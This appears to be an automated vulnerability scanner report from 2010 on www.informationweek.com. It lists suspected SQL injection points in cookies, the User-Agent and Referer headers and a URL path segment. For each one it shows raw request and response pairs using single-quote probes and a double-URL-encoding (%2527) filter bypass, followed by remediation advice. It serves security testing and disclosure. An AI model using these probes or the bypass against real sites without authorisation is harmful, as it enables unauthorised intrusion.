The ebNewBandWidth_.www.informationweek.com cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ebNewBandWidth_.www.informationweek.com cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ebNewBandWidth_.www.informationweek.com cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333%2527; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:22:16 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:16 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 62134
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333%2527%2527; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:18 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:18 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The iwkbtn_101201 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_101201 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731'; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:22:00 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:00 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 62125
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731''; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:01 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:01 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The iwkbtn_emc_101111 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_emc_101111 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541'; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:57 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:57 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 62869
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541''; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:58 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:58 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_lv cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529'; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:48 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:48 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 62869
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529''; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:50 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:50 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_lv_s cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv_s cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the s_lv_s cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days%2527;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:22:20 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:20 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 62869
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days%2527%2527;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:22:21 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:21 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /whitepaper/Security/Privacy/access-governance-as-a-business-service-an-integ-wp1288732602140 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:22:49 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:49 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 62931
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Privacy/access-governance-as-a-business-service-an-integ-wp1288732602140 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:51 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:51 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Privacy/access-governance-as-a-business-service-an-integ-wp1288732602140&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012%2527 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:49 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:49 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30461
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <p class="StoryContentColor">The URL (Web address) that has been entered is directing to a non-existent page on the InformationWeek.com website. Please check that there are no typographical errors in the URL. If the URL is correct, then <a href="http://www.informationweek.com/contactus.jhtml;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN#onlineprod"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012%2527%2527 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:23:49 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:49 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012%2527%2527&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Referer: http://www.google.com/search?hl=en&q='
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:23:10 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:10 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 62489
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Referer: http://www.google.com/search?hl=en&q=''
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:23:11 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:11 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1 (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:23:06 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:06 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 62494
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:23:08 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:08 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
